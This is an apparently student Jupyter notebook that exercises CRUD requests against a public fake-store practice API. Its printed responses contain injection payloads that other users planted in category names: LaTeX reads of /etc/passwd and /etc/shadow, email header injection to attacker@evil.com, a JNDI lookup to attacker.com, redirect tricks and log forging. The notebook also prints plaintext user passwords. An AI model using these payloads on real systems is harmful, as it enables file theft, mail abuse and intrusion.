In [1]:
import requests
import pandas as pd
response = requests.get('https://api.escuelajs.co/api/v1/products')
df = pd.DataFrame(response.json())
df

,id,title,slug,price,description,category,images,creationAt,updatedAt
0,174,Lorem Ipsum is a standard placeholder,lorem-ipsum-is-a-standard-placeholder,10,Lorem Ipsum is a standard placeholder text use...,"{'id': 5, 'name': 'Miscellaneous', 'slug': 'mi...",[https://i.pravatar.cc/300],2026-04-10T13:50:00.000Z,2026-04-10T13:51:04.000Z
1,175,Buzo rojo,buzo-rojo,120000,Buzo rojo creado desde python,"{'id': 2, 'name': 'Home Appliances', 'slug': '...",[https://placeimg.com/640/480/any],2026-04-10T14:31:19.000Z,2026-04-10T14:31:19.000Z
2,176,Teclado Mecánico rgb6,teclado-mecanico-rgb6,120,Teclado gamer switches blue,"{'id': 109, 'name': 'Norris Mount', 'slug': 'n...",[https://placeimg.com/640/480/tech],2026-04-10T14:54:30.000Z,2026-04-10T14:54:30.000Z
3,177,Producto 1775833570,producto-1775833570,100,Producto de prueba,"{'id': 109, 'name': 'Norris Mount', 'slug': 'n...",[https://placeimg.com/640/480/tech],2026-04-10T15:06:11.000Z,2026-04-10T15:06:11.000Z
4,178,New Product,new-product,10,A description,"{'id': 200, 'name': 'victim@test.com%0aX-Origi...",[https://placehold.co/600x400],2026-04-10T15:11:15.000Z,2026-04-10T15:11:15.000Z
5,179,Hacker,hacker,100000,Prueba,"{'id': 2, 'name': 'Home Appliances', 'slug': '...",[https://guds.rnh.gob.sv/uploads/-/system/user...,2026-04-10T15:52:42.000Z,2026-04-10T15:52:42.000Z

In [2]:
#POST para crear un producto nuevo
new_post = {
    'title': 'Buzo rojo universitario',
    'price': 430000,
    'description': 'Buzo rojo universitario creado desde python',
    'categoryId': 2,
    'images': ['https://placeimg.com/640/480/any']
}

response = requests.post('https://api.escuelajs.co/api/v1/products', json=new_post)
print(response.status_code)
print(response.json())

201
{'id': 187, 'title': 'Buzo rojo universitario', 'slug': 'buzo-rojo-universitario', 'price': 430000, 'description': 'Buzo rojo universitario creado desde python', 'category': {'id': 2, 'name': 'Home Appliances', 'slug': 'home-appliances', 'image': 'https://fruitbasket.limepack.com/blog/wp-content/uploads/2024/06/assorted-pastries-arranged-in-dispaly.jpg', 'creationAt': '2026-04-09T20:17:43.000Z', 'updatedAt': '2026-04-10T15:53:00.000Z'}, 'images': ['https://placeimg.com/640/480/any'], 'creationAt': '2026-04-10T15:56:35.000Z', 'updatedAt': '2026-04-10T15:56:35.000Z'}

In [3]:
#GET para visualizar producto "Buzo rojo universitario"
filtro={'title':'Buzo rojo universitario'}
response = requests.get('https://api.escuelajs.co/api/v1/products', params=filtro)
df = pd.DataFrame(response.json())
df

,id,title,slug,price,description,category,images,creationAt,updatedAt
0,187,Buzo rojo universitario,buzo-rojo-universitario,430000,Buzo rojo universitario creado desde python,"{'id': 2, 'name': 'Home Appliances', 'slug': '...",[https://placeimg.com/640/480/any],2026-04-10T15:56:35.000Z,2026-04-10T15:56:35.000Z

In [75]:
#PUT para cambiar información del producto
datos_actualizados= {
    'title': 'Buzo universitario nuevo',
    'price': 50000,
}
producto_id = 2
response = requests.put(f"https://api.escuelajs.co/api/v1/products/{producto_id}", json=datos_actualizados)
print(response.status_code)
print(response.json())

400
{'path': '/api/v1/products/2', 'timestamp': '2026-04-10T18:13:47.531Z', 'name': 'EntityNotFoundError', 'message': 'Could not find any entity of type "Product" matching: {\n    "relations": [\n        "category"\n    ],\n    "where": {\n        "id": 2\n    }\n}'}

In [ ]:
#PATCH: Reemplazo parcial

url = 'https://api.escuelajs.co/api/v1/categories/1'
#filtro={'userId':2}
#datos= {
 #   'role': 'administrador'
    
#}
response = requests.patch(url, json={'slug': 'zapatos negros'})
print(response.status_code)
print(response.json())

404
{'message': 'Cannot PATCH /api/v1/categories/1', 'error': 'Not Found', 'statusCode': 404}

In [5]:

response = requests.get('https://api.escuelajs.co/api/v1/categories')
response.json()

[{'id': 2,
  'name': 'Updated Category',
  'slug': 'updated-category',
  'image': 'https://fruitbasket.limepack.com/blog/wp-content/uploads/2024/06/assorted-pastries-arranged-in-dispaly.jpg',
  'creationAt': '2026-04-09T20:17:43.000Z',
  'updatedAt': '2026-04-10T13:58:39.000Z'},
 {'id': 3,
  'name': 'personal care skin',
  'slug': 'personal-care-skin',
  'image': 'https://t4.ftcdn.net/jpg/01/68/51/55/360_F_168515550_AYObBKUuUS3k0fleEsBI0yxVGVYOm5nm.jpg',
  'creationAt': '2026-04-09T20:17:43.000Z',
  'updatedAt': '2026-04-10T13:49:15.000Z'},
 {'id': 4,
  'name': 'snacks',
  'slug': 'snacks',
  'image': 'https://assets.aboutamazon.com/dims4/default/e2f1573/2147483647/strip/true/crop/1279x720+0+0/resize/1240x698!/quality/90/?url=https%3A%2F%2Famazon-blogs-brightspot.s3.amazonaws.com%2F10%2F3c%2F5b7a5b74408b93c9af780b80f1f6%2Fbanner-snacks.jpg',
  'creationAt': '2026-04-09T20:17:43.000Z',
  'updatedAt': '2026-04-10T13:43:54.000Z'},
 {'id': 5,
  'name': 'Miscellaneous',
  'slug': 'miscellaneous',
  'image': 'https://i.imgur.com/BG8J0Fj.jpg',
  'creationAt': '2026-04-09T20:17:43.000Z',
  'updatedAt': '2026-04-09T20:17:43.000Z'},
 {'id': 8,
  'name': 'Baby iFUl2ISy',
  'slug': 'baby-iful2isy',
  'image': 'https://picsum.photos/seed/mAEv9ztGn/600/400',
  'creationAt': '2026-04-09T21:16:35.000Z',
  'updatedAt': '2026-04-09T21:16:35.000Z'},
 {'id': 10,
  'name': 'Home A0zE1JY5',
  'slug': 'home-a0ze1jy5',
  'image': 'https://loremflickr.com/600/400?lock=7399364394401768',
  'creationAt': '2026-04-09T21:16:40.000Z',
  'updatedAt': '2026-04-09T21:16:40.000Z'},
 {'id': 12,
  'name': 'Clothing rIfztWy5',
  'slug': 'clothing-rifztwy5',
  'image': 'https://picsum.photos/seed/DLFhqzc/600/400',
  'creationAt': '2026-04-09T21:16:42.000Z',
  'updatedAt': '2026-04-09T21:16:42.000Z'},
 {'id': 13,
  'name': 'Garden zbssq4sC',
  'slug': 'garden-zbssq4sc',
  'image': 'https://picsum.photos/seed/66DDD2MUTB/600/400',
  'creationAt': '2026-04-09T21:16:42.000Z',
  'updatedAt': '2026-04-09T21:16:42.000Z'},
 {'id': 15,
  'name': 'Beauty xRA081zX',
  'slug': 'beauty-xra081zx',
  'image': 'https://loremflickr.com/600/400?lock=2800805260594989',
  'creationAt': '2026-04-09T21:16:45.000Z',
  'updatedAt': '2026-04-09T21:16:45.000Z'},
 {'id': 16,
  'name': 'Baby SAbYLXjd',
  'slug': 'baby-sabylxjd',
  'image': 'https://loremflickr.com/600/400?lock=6666877297168127',
  'creationAt': '2026-04-09T21:17:06.000Z',
  'updatedAt': '2026-04-09T21:17:06.000Z'},
 {'id': 17,
  'name': 'Music K8qBLbSj',
  'slug': 'music-k8qblbsj',
  'image': 'https://loremflickr.com/600/400?lock=8215609407434657',
  'creationAt': '2026-04-09T21:17:10.000Z',
  'updatedAt': '2026-04-09T21:17:10.000Z'},
 {'id': 19,
  'name': 'Automotive u2Nu79na',
  'slug': 'automotive-u2nu79na',
  'image': 'https://picsum.photos/seed/6AXge8Pa/600/400',
  'creationAt': '2026-04-09T21:17:12.000Z',
  'updatedAt': '2026-04-09T21:17:12.000Z'},
 {'id': 21,
  'name': 'Health ije93Oxr',
  'slug': 'health-ije93oxr',
  'image': 'https://loremflickr.com/600/400?lock=6870229046870865',
  'creationAt': '2026-04-09T21:17:13.000Z',
  'updatedAt': '2026-04-09T21:17:13.000Z'},
 {'id': 23,
  'name': 'Kids 1CqeVXaq',
  'slug': 'kids-1cqevxaq',
  'image': 'https://picsum.photos/seed/unQ4BJx/600/400',
  'creationAt': '2026-04-09T21:17:15.000Z',
  'updatedAt': '2026-04-09T21:17:15.000Z'},
 {'id': 25,
  'name': 'Grocery PcNx6SNB',
  'slug': 'grocery-pcnx6snb',
  'image': 'https://picsum.photos/seed/jUBZ9/600/400',
  'creationAt': '2026-04-09T21:35:55.000Z',
  'updatedAt': '2026-04-09T21:35:55.000Z'},
 {'id': 26,
  'name': 'Health qkaI8PBc',
  'slug': 'health-qkai8pbc',
  'image': 'https://loremflickr.com/600/400?lock=1931682612684545',
  'creationAt': '2026-04-09T21:35:55.000Z',
  'updatedAt': '2026-04-09T21:35:55.000Z'},
 {'id': 27,
  'name': 'Toys m1SqiAiW',
  'slug': 'toys-m1sqiaiw',
  'image': 'https://picsum.photos/seed/09p04iR/600/400',
  'creationAt': '2026-04-09T21:35:57.000Z',
  'updatedAt': '2026-04-09T21:35:57.000Z'},
 {'id': 28,
  'name': 'Books tlxaJyL6',
  'slug': 'books-tlxajyl6',
  'image': 'https://loremflickr.com/600/400?lock=8488904027527676',
  'creationAt': '2026-04-09T21:35:58.000Z',
  'updatedAt': '2026-04-09T21:35:58.000Z'},
 {'id': 29,
  'name': 'Music ld1ku6RV',
  'slug': 'music-ld1ku6rv',
  'image': 'https://picsum.photos/seed/LOLOtIW/600/400',
  'creationAt': '2026-04-09T21:35:58.000Z',
  'updatedAt': '2026-04-09T21:35:58.000Z'},
 {'id': 31,
  'name': 'Beauty 3BOulHnk',
  'slug': 'beauty-3boulhnk',
  'image': 'https://loremflickr.com/600/400?lock=5177684359937912',
  'creationAt': '2026-04-09T21:36:01.000Z',
  'updatedAt': '2026-04-09T21:36:01.000Z'},
 {'id': 33,
  'name': 'Movies yw34fI1d',
  'slug': 'movies-yw34fi1d',
  'image': 'https://picsum.photos/seed/ZXtUb/600/400',
  'creationAt': '2026-04-09T21:36:24.000Z',
  'updatedAt': '2026-04-09T21:36:24.000Z'},
 {'id': 35,
  'name': 'Tools 6zVw29jH',
  'slug': 'tools-6zvw29jh',
  'image': 'https://picsum.photos/seed/nok0t/600/400',
  'creationAt': '2026-04-09T21:36:26.000Z',
  'updatedAt': '2026-04-09T21:36:26.000Z'},
 {'id': 37,
  'name': 'Beauty N0CWI7C0',
  'slug': 'beauty-n0cwi7c0',
  'image': 'https://loremflickr.com/600/400?lock=4428022866082037',
  'creationAt': '2026-04-09T21:36:26.000Z',
  'updatedAt': '2026-04-09T21:36:26.000Z'},
 {'id': 39,
  'name': 'Kids E3mAUEli',
  'slug': 'kids-e3maueli',
  'image': 'https://loremflickr.com/600/400?lock=7691908885611945',
  'creationAt': '2026-04-09T21:36:29.000Z',
  'updatedAt': '2026-04-09T21:36:29.000Z'},
 {'id': 41,
  'name': 'Toys ozxKFeJn',
  'slug': 'toys-ozxkfejn',
  'image': 'https://picsum.photos/seed/LbVlqFXHLw/600/400',
  'creationAt': '2026-04-09T21:38:11.000Z',
  'updatedAt': '2026-04-09T21:38:11.000Z'},
 {'id': 42,
  'name': 'Shoes RHkDdqyS',
  'slug': 'shoes-rhkddqys',
  'image': 'https://loremflickr.com/600/400?lock=3075304175638467',
  'creationAt': '2026-04-09T21:38:12.000Z',
  'updatedAt': '2026-04-09T21:38:12.000Z'},
 {'id': 43,
  'name': 'Outdoors sJCkTyFN',
  'slug': 'outdoors-sjcktyfn',
  'image': 'https://picsum.photos/seed/AdiBsT/600/400',
  'creationAt': '2026-04-09T21:38:13.000Z',
  'updatedAt': '2026-04-09T21:38:13.000Z'},
 {'id': 47,
  'name': 'Automotive vZOzYxba',
  'slug': 'automotive-vzozyxba',
  'image': 'https://picsum.photos/seed/PLxLAs/600/400',
  'creationAt': '2026-04-09T21:38:17.000Z',
  'updatedAt': '2026-04-09T21:38:17.000Z'},
 {'id': 83,
  'name': 'gopher://attacker.com',
  'slug': 'gopher-attacker-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T05:49:56.000Z',
  'updatedAt': '2026-04-10T05:49:56.000Z'},
 {'id': 99,
  'name': '//evil.com%00.trusted.com',
  'slug': 'evil-com-00-trusted-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T05:50:00.000Z',
  'updatedAt': '2026-04-10T05:50:00.000Z'},
 {'id': 100,
  'name': 'https://attacker.com#@target.com',
  'slug': 'https-attacker-com-target-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T05:50:01.000Z',
  'updatedAt': '2026-04-10T05:50:01.000Z'},
 {'id': 104,
  'name': 'vegetables',
  'slug': 'vegetables',
  'image': 'https://www.simplotfood.com/_next/image?url=https%3A%2F%2Fimages.ctfassets.net%2F0dkgxhks0leg%2F4LaYoCoepR6ZwEkAmQFh2F%2Fe82fa8e3c87f0e4cdb3e914b3e766fa0%2Fblog-large-2020veg.jpg%3Ffm%3Dwebp&w=1920&q=75',
  'creationAt': '2026-04-10T05:50:02.000Z',
  'updatedAt': '2026-04-10T13:37:00.000Z'},
 {'id': 105,
  'name': 'Testing Category',
  'slug': 'testing-category',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:03:35.000Z',
  'updatedAt': '2026-04-10T06:03:35.000Z'},
 {'id': 106,
  'name': 'israel the king',
  'slug': 'israel-the-king',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:26:48.000Z',
  'updatedAt': '2026-04-10T06:26:48.000Z'},
 {'id': 107,
  'name': 'israel the eee',
  'slug': 'israel-the-eee',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:28:50.000Z',
  'updatedAt': '2026-04-10T06:28:50.000Z'},
 {'id': 109,
  'name': 'Norris Mount',
  'slug': 'norris-mount',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:29:40.000Z',
  'updatedAt': '2026-04-10T06:29:40.000Z'},
 {'id': 111,
  'name': 'Metz Port',
  'slug': 'metz-port',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:29:44.000Z',
  'updatedAt': '2026-04-10T06:29:44.000Z'},
 {'id': 112,
  'name': 'Jerome Inlet',
  'slug': 'jerome-inlet',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:30:03.000Z',
  'updatedAt': '2026-04-10T06:30:03.000Z'},
 {'id': 113,
  'name': 'Liliane Island',
  'slug': 'liliane-island',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:30:06.000Z',
  'updatedAt': '2026-04-10T06:30:06.000Z'},
 {'id': 114,
  'name': 'Borer Forest',
  'slug': 'borer-forest',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:30:11.000Z',
  'updatedAt': '2026-04-10T06:30:11.000Z'},
 {'id': 116,
  'name': 'Heath View',
  'slug': 'heath-view',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:30:19.000Z',
  'updatedAt': '2026-04-10T06:30:19.000Z'},
 {'id': 117,
  'name': 'Alexandre Walks',
  'slug': 'alexandre-walks',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:30:47.000Z',
  'updatedAt': '2026-04-10T06:30:47.000Z'},
 {'id': 118,
  'name': 'Bergnaum Loaf',
  'slug': 'bergnaum-loaf',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:31:14.000Z',
  'updatedAt': '2026-04-10T06:31:14.000Z'},
 {'id': 119,
  'name': 'Dylan Cliff',
  'slug': 'dylan-cliff',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:31:21.000Z',
  'updatedAt': '2026-04-10T06:31:21.000Z'},
 {'id': 121,
  'name': 'Schmitt Turnpike',
  'slug': 'schmitt-turnpike',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:31:57.000Z',
  'updatedAt': '2026-04-10T06:31:57.000Z'},
 {'id': 122,
  'name': 'Kategori Baru',
  'slug': 'kategori-baru',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T06:45:24.000Z',
  'updatedAt': '2026-04-10T06:45:24.000Z'},
 {'id': 139,
  'name': 'Category 1775809201659',
  'slug': 'category-1775809201659',
  'image': 'https://placeimg.com/640/480/any',
  'creationAt': '2026-04-10T08:20:03.000Z',
  'updatedAt': '2026-04-10T08:20:03.000Z'},
 {'id': 141,
  'name': 'Bag',
  'slug': 'bag',
  'image': 'https://i.pravatar.cc',
  'creationAt': '2026-04-10T09:19:37.000Z',
  'updatedAt': '2026-04-10T09:19:37.000Z'},
 {'id': 142,
  'name': 'Вass',
  'slug': 'ass',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T09:26:27.000Z',
  'updatedAt': '2026-04-10T09:26:27.000Z'},
 {'id': 143,
  'name': 'Jjj',
  'slug': 'jjj',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T09:28:20.000Z',
  'updatedAt': '2026-04-10T09:28:20.000Z'},
 {'id': 144,
  'name': 'Test Category 1775814178427',
  'slug': 'test-category-1775814178427',
  'image': 'https://i.imgur.com/Qphac99.jpeg',
  'creationAt': '2026-04-10T09:42:59.000Z',
  'updatedAt': '2026-04-10T09:42:59.000Z'},
 {'id': 145,
  'name': 'Test Category 1775815000178',
  'slug': 'test-category-1775815000178',
  'image': 'https://i.imgur.com/Qphac99.jpeg',
  'creationAt': '2026-04-10T09:56:43.000Z',
  'updatedAt': '2026-04-10T09:56:43.000Z'},
 {'id': 147,
  'name': '$7 \\times 7 = 49$',
  'slug': '7-times-7-49',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:56.000Z',
  'updatedAt': '2026-04-10T12:30:56.000Z'},
 {'id': 148,
  'name': '\\input{/etc/passwd}',
  'slug': 'input-etc-passwd',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:56.000Z',
  'updatedAt': '2026-04-10T12:30:56.000Z'},
 {'id': 149,
  'name': 'victim@test.com%0aBcc:attacker@evil.com',
  'slug': 'victim-test-com-0abcc-attacker-evil-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:57.000Z',
  'updatedAt': '2026-04-10T12:30:57.000Z'},
 {'id': 150,
  'name': 'victim@test.com%0d%0aCc:attacker@evil.com',
  'slug': 'victim-test-com-0d-0acc-attacker-evil-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:57.000Z',
  'updatedAt': '2026-04-10T12:30:57.000Z'},
 {'id': 151,
  'name': '\\include{/etc/passwd}',
  'slug': 'include-etc-passwd',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:57.000Z',
  'updatedAt': '2026-04-10T12:30:57.000Z'},
 {'id': 152,
  'name': '\\openin\\file=/etc/passwd \\read\\file to\\line \\line \\closein\\file',
  'slug': 'openin-file-etc-passwd-read-file-to-line-line-closein-file',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:58.000Z',
  'updatedAt': '2026-04-10T12:30:58.000Z'},
 {'id': 154,
  'name': 'victim@test.com%0d%0aBcc:attacker@evil.com',
  'slug': 'victim-test-com-0d-0abcc-attacker-evil-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:58.000Z',
  'updatedAt': '2026-04-10T12:30:58.000Z'},
 {'id': 155,
  'name': '\\verbatiminput{/etc/passwd}',
  'slug': 'verbatiminput-etc-passwd',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:58.000Z',
  'updatedAt': '2026-04-10T12:30:58.000Z'},
 {'id': 156,
  'name': 'victim@test.com\\nCc:attacker@evil.com',
  'slug': 'victim-test-com-ncc-attacker-evil-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:59.000Z',
  'updatedAt': '2026-04-10T12:30:59.000Z'},
 {'id': 157,
  'name': 'victim@test.com\\r\\nBcc:attacker@evil.com',
  'slug': 'victim-test-com-r-nbcc-attacker-evil-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:59.000Z',
  'updatedAt': '2026-04-10T12:30:59.000Z'},
 {'id': 158,
  'name': '\\catcode`\\$=\\other \\input{/etc/shadow}',
  'slug': 'catcode-other-input-etc-shadow',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:30:59.000Z',
  'updatedAt': '2026-04-10T12:30:59.000Z'},
 {'id': 161,
  'name': '\\url{file:///etc/passwd}',
  'slug': 'url-file-etc-passwd',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:00.000Z',
  'updatedAt': '2026-04-10T12:31:00.000Z'},
 {'id': 162,
  'name': '\\href{file:///etc/passwd}{click}',
  'slug': 'href-file-etc-passwd-click',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:00.000Z',
  'updatedAt': '2026-04-10T12:31:00.000Z'},
 {'id': 163,
  'name': 'victim@test.com%0aContent-Type:text/html',
  'slug': 'victim-test-com-0acontent-type-text-html',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:00.000Z',
  'updatedAt': '2026-04-10T12:31:00.000Z'},
 {'id': 164,
  'name': '\\typeout{\\input{/etc/hostname}}',
  'slug': 'typeout-input-etc-hostname',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:00.000Z',
  'updatedAt': '2026-04-10T12:31:00.000Z'},
 {'id': 165,
  'name': '$\\mathrm{\\input{/etc/passwd}}$',
  'slug': 'mathrm-input-etc-passwd',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:01.000Z',
  'updatedAt': '2026-04-10T12:31:01.000Z'},
 {'id': 166,
  'name': '\\csname @@input\\endcsname{/etc/passwd}',
  'slug': 'csname-input-endcsname-etc-passwd',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:01.000Z',
  'updatedAt': '2026-04-10T12:31:01.000Z'},
 {'id': 167,
  'name': 'victim@test.com%0a%0a<html><body>Phishing content</body></html>',
  'slug': 'victim-test-com-0a-0a-html-body-phishing-content-body-html',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:01.000Z',
  'updatedAt': '2026-04-10T12:31:01.000Z'},
 {'id': 168,
  'name': 'victim@test.com%0aFrom:admin@legitimate.com',
  'slug': 'victim-test-com-0afrom-admin-legitimate-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:02.000Z',
  'updatedAt': '2026-04-10T12:31:02.000Z'},
 {'id': 169,
  'name': 'input_passwd',
  'slug': 'input-passwd',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:02.000Z',
  'updatedAt': '2026-04-10T12:31:02.000Z'},
 {'id': 170,
  'name': 'invalid_test_value_xyz_12345',
  'slug': 'invalid-test-value-xyz-12345',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:03.000Z',
  'updatedAt': '2026-04-10T12:31:03.000Z'},
 {'id': 171,
  'name': 'include_passwd',
  'slug': 'include-passwd',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:03.000Z',
  'updatedAt': '2026-04-10T12:31:03.000Z'},
 {'id': 172,
  'name': 'victim@test.com%0aReply-To:attacker@evil.com',
  'slug': 'victim-test-com-0areply-to-attacker-evil-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:03.000Z',
  'updatedAt': '2026-04-10T12:31:03.000Z'},
 {'id': 173,
  'name': 'victim@test.com%0aX-Mailer:EvilMailer',
  'slug': 'victim-test-com-0ax-mailer-evilmailer',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:03.000Z',
  'updatedAt': '2026-04-10T12:31:03.000Z'},
 {'id': 182,
  'name': '\\\\input{/etc/hostname}',
  'slug': 'input-etc-hostname',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:06.000Z',
  'updatedAt': '2026-04-10T12:31:06.000Z'},
 {'id': 183,
  'name': 'input_hostname',
  'slug': 'input-hostname',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:07.000Z',
  'updatedAt': '2026-04-10T12:31:07.000Z'},
 {'id': 184,
  'name': 'admin%0d%0a[INFO] User logged in successfully',
  'slug': 'admin-0d-0a-info-user-logged-in-successfully',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:07.000Z',
  'updatedAt': '2026-04-10T12:31:07.000Z'},
 {'id': 185,
  'name': '\\\\input{C:/Windows/win.ini}',
  'slug': 'input-c-windows-win-ini',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:07.000Z',
  'updatedAt': '2026-04-10T12:31:07.000Z'},
 {'id': 186,
  'name': 'test\\n[CRITICAL] System compromised',
  'slug': 'test-n-critical-system-compromised',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:07.000Z',
  'updatedAt': '2026-04-10T12:31:07.000Z'},
 {'id': 187,
  'name': '"victim@test.com\nCc:attacker@evil.com"',
  'slug': 'victim-test-com-cc-attacker-evil-com',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:07.000Z',
  'updatedAt': '2026-04-10T12:31:07.000Z'},
 {'id': 188,
  'name': 'input_winini',
  'slug': 'input-winini',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:07.000Z',
  'updatedAt': '2026-04-10T12:31:07.000Z'},
 {'id': 189,
  'name': '\\\\newread\\\\file \\\\openin\\\\file=/etc/passwd \\\\read\\\\file to\\\\line \\\\line \\\\closein\\\\file',
  'slug': 'newread-file-openin-file-etc-passwd-read-file-to-line-line-closein-file',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:07.000Z',
  'updatedAt': '2026-04-10T12:31:07.000Z'},
 {'id': 190,
  'name': 'openin_passwd',
  'slug': 'openin-passwd',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:07.000Z',
  'updatedAt': '2026-04-10T12:31:07.000Z'},
 {'id': 194,
  'name': 'victim@test.com%0aX-Priority:1',
  'slug': 'victim-test-com-0ax-priority-1',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:08.000Z',
  'updatedAt': '2026-04-10T12:31:08.000Z'},
 {'id': 195,
  'name': '${jndi:rmi://attacker.com/a}',
  'slug': 'jndi-rmi-attacker-com-a',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:08.000Z',
  'updatedAt': '2026-04-10T12:31:08.000Z'},
 {'id': 196,
  'name': 'victim@test.com%0aImportance:high',
  'slug': 'victim-test-com-0aimportance-high',
  'image': 'https://placehold.co/600x400',
  'creationAt': '2026-04-10T12:31:08.000Z',

In [64]:
response = requests.get('https://api.escuelajs.co/api/v1/users')
response.json()

[{'id': 1,
  'email': 'john@mail.com',
  'password': 'changeme',
  'name': 'Jhon',
  'role': 'customer',
  'avatar': 'https://i.imgur.com/LDOO4Qs.jpg',
  'creationAt': '2026-04-09T20:17:43.000Z',
  'updatedAt': '2026-04-09T20:17:43.000Z'},
 {'id': 2,
  'email': 'maria@mail.com',
  'password': '12345',
  'name': 'Maria',
  'role': 'customer',
  'avatar': 'https://i.imgur.com/DTfowdu.jpg',
  'creationAt': '2026-04-09T20:17:43.000Z',
  'updatedAt': '2026-04-09T20:17:43.000Z'},
 {'id': 3,
  'email': 'admin@mail.com',
  'password': 'admin123',
  'name': 'Admin',
  'role': 'admin',
  'avatar': 'https://i.imgur.com/yhW6Yw1.jpg',
  'creationAt': '2026-04-09T20:17:43.000Z',
  'updatedAt': '2026-04-09T20:17:43.000Z'},
 {'id': 7,
  'email': 'leo@gmail.com',
  'password': '123456',
  'name': 'leo',
  'role': 'customer',
  'avatar': 'https://picsum.photos/200',
  'creationAt': '2026-04-09T20:38:28.000Z',
  'updatedAt': '2026-04-09T20:38:28.000Z'},
 {'id': 8,
  'email': 'beko@gmail.com',
  'password': 'uhuhax202',
  'name': 'beko',
  'role': 'admin',
  'avatar': 'image.exam',
  'creationAt': '2026-04-09T21:01:50.000Z',
  'updatedAt': '2026-04-09T21:01:50.000Z'},
 {'id': 9,
  'email': 'elebiary33@gmail.com',
  'password': 'asdasdasdad',
  'name': 'fatma',
  'role': 'customer',
  'avatar': 'https://picsum.photos/200',
  'creationAt': '2026-04-09T21:03:58.000Z',
  'updatedAt': '2026-04-09T21:03:58.000Z'}]

In [64]:
response = requests.delete('https://api.escuelajs.co/api/v1/categories/19')
print(response.status_code)

200

In [7]:
""" Obtenemos todos los usuarios """
response = requests.get('https://api.escuelajs.co/api/v1/users')
response.json()

[{'id': 1,
  'email': 'john@mail.com',
  'password': 'changeme',
  'name': 'change',
  'role': 'customer',
  'avatar': 'https://i.imgur.com/LDOO4Qs.jpg',
  'creationAt': '2026-04-09T20:17:43.000Z',
  'updatedAt': '2026-04-10T09:20:25.000Z'},
 {'id': 2,
  'email': 'maria@mail.com',
  'password': '12345',
  'name': 'Maria',
  'role': 'customer',
  'avatar': 'https://i.imgur.com/DTfowdu.jpg',
  'creationAt': '2026-04-09T20:17:43.000Z',
  'updatedAt': '2026-04-09T20:17:43.000Z'},
 {'id': 3,
  'email': 'admin@mail.com',
  'password': 'admin123',
  'name': 'Admin',
  'role': 'admin',
  'avatar': 'https://i.imgur.com/yhW6Yw1.jpg',
  'creationAt': '2026-04-09T20:17:43.000Z',
  'updatedAt': '2026-04-09T20:17:43.000Z'},
 {'id': 10,
  'email': 'sevrukvp3@gmail.com',
  'password': 'Qwe123',
  'name': 'Aleks',
  'role': 'admin',
  'avatar': 'https://placehold.co/200x200/e8e5df/1a1916?text=User',
  'creationAt': '2026-04-10T00:33:20.000Z',
  'updatedAt': '2026-04-10T05:09:16.000Z'},
 {'id': 11,
  'email': 'teste@teste.com',
